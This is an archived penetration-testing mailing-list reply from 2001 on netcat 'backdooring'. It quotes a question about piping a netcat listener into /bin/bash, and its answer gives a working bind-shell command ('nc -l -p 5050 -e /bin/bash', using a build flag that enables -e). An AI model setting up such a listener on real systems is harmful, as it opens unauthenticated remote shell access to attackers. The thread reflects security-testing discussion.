Penetration Testing mailing list archives

Re: [PEN-TEST] nc backdooring

From: Cold Fire <coldfire () SHADY ORG>
Date: Thu, 25 Jan 2001 21:27:53 +0000

On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
Hi, folks !

In one machine (the server - with root permission)  I typed:

nc -l -p 5050 | /bin/bash

In another machine (the client) I typed:

nc server_ip 5050

With this I could execute any program in the server.
Both machines are Red Hat Linux.

The question is: How can I can the output of the remote execution back? Is
there nicer way of doing this with netcat?

Compile netcat with -DGAPING_SECURITY_HOLE then:

nc -v -l -p 5050 -e '/bin/bash' on the server

and

nc -v <ip> 5050 on your box.

Steve

--
'Cold Fire, Britains most notorious hacker' Observer, July 1997
'The most recent conviction was that of [Cold Fire] whose On-line